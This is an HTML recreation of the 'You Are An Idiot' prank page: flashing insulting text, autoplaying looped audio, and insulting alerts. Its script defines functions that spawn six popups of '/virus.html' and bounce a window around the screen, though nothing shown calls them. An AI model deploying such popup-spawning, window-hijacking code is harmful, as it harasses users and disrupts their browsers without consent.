<html>
<head>
<title>You Are An Idiot!</title>
<style>
html, body {
margin: 0;
padding: 0;
}
body {
font-family: 'Times New Roman', 'DejaVu Serif', Times, serif;
}
@keyframes idiotblink {
0% { color: #000; background: #fff; }
/*1% { color: #000; background: #fff; }*/
49% { color: #000; background: #fff; }
50% { color: #fff; background: #000; }
99% { color: #fff; background: #000; }
100% { color: #fff; background: #000; }
}
.idiot {
width: 100%;
height: 100%;
animation-name: idiotblink;
animation-duration: 900ms;
animation-iteration-count: infinite;
animation-fill-mode: both;
display: flex;
flex-direction: column;
justify-content: center;
align-items: center;
text-align: center;
font-size: 12vh;
}
#smiley {
font-family: "Segoe UI Symbol", sans-serif;
font-size: 2em;
}
embed {
display: hidden;
visibillity: hidden;
}
</style>
</head>
<body>
<audio src="idiot.mp3" loop="loop" autoplay="autoplay" preload="auto">
<source src="idiot.mp3" type="audio/mp3"/>
</audio>
<div class="idiot"><p>you are an idiot<br/><span id="smiley">☺☺☺</span></p></div>
</body>
<script>
if (!window.Audio) {
window.alert("You browser can't play the audio, idiot! Your browser is outdated! Your browser is idiot! It will be silence until you upgrade the browser!");
console.error("Can't initialize audio, the browser may doesn't support HTML5");
}
if (!window.Animation) {
window.alert("You browser can't blink the background and text, idiot! Your browser is outdated! Your browser is idiot! The text and background isn't even blinking forever until you upgrade the browser!");
console.error("Can't initialize animation, the browser may doesn't support HTML5");
}


		var xOff = 5;
		var yOff = 5;
		var xPos = 400;
		var yPos = -100;
		var flagRun = 1;

function openWindow(url){
        aWindow = window.open(url,"_blank", 'menubar=no,status=no,toolbar=noresizable=no,width=180,height=175,titlebar=no,alwaysRaised=yes');
}

function procreate(){
		openWindow('/virus.html');
		openWindow('/virus.html');
		openWindow('/virus.html');
		openWindow('/virus.html');
		openWindow('/virus.html');
		openWindow('/virus.html');
		}

function newXlt(){
        xOff = Math.ceil( 0 - 6 * Math.random()) * 5 - 10 ;
        window.focus()}

function newXrt(){
        xOff = Math.ceil(7 * Math.random())  * 5 - 10 ;
        }

function newYup(){
        yOff = Math.ceil( 0 - 6 * Math.random())  * 5 - 10 ;
        }

function newYdn(){
        yOff = Math.ceil( 7 * Math.random())  * 5 - 10  ;
        }
function fOff(){
        flagrun = 0;
        }

function playBall(){
        xPos += xOff;
        yPos += yOff;
        if (xPos > screen.width-175){
        newXlt();
        }
        if (xPos < 0){
        newXrt();
        }
        if (yPos > screen.height-100){
        newYup();
        }
        if (yPos < 0){
        newYdn();
        }
        if (flagRun == 1){
        window.moveTo(xPos,yPos);
        setTimeout('playBall()',1);
        }
        }
</script>
</html>
